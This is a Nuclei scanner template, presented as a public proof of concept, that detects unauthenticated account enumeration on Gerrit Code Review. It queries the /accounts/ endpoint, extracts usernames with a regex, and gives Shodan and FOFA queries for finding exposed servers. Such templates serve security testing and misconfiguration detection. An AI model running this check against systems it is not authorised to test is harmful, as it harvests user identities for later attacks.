Gerrit Code Review exposes the /accounts/ REST API endpoint which can be used to enumerate user accounts.The endpoint allows querying for accounts by username, email, or name, potentially revealing sensitive user information including account IDs, names, emails, and usernames without authentication.
PoC代码[已公开]
id: gerrit-account-enum
info:
name: Gerrit Code Review - Account Enumeration
author: DhiyaneshDk
severity: medium
description: |
Gerrit Code Review exposes the /accounts/ REST API endpoint which can be used to enumerate user accounts.The endpoint allows querying for accounts by username, email, or name, potentially revealing sensitive user information including account IDs, names, emails, and usernames without authentication.
reference:
- https://gerrit-review.googlesource.com/Documentation/rest-api-accounts.html
- https://gerrit-documentation.storage.googleapis.com/Documentation/2.11/rest-api-accounts.html
metadata:
max-request: 2
verified: true
shodan-query: title:"Gerrit Code Review"
fofa-query: title="Gerrit Code Review"
tags: gerrit,enum,exposure,misconfig
http:
- method: GET
path:
- "{{BaseURL}}/accounts/?q=a&n=10"
- "{{BaseURL}}/accounts/?suggest&q=a&n=10"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "_account_id"
- "username"
condition: and
- type: status
status:
- 200
extractors:
- type: regex
name: usernames
part: body
group: 1
regex:
- '"username":\s*"([^"]+)"'
# digest: 490a0046304402200a73ce4ae2f3fedd7a62c931f0ad59c91e24ab7e10c68d9810fd6e297924634602201dbdd6af385809d62b9d150781c83ed8032c40bdb43d9a4e3bef5d0f114f8da3:922c64590222798bb761d5b6d8e72950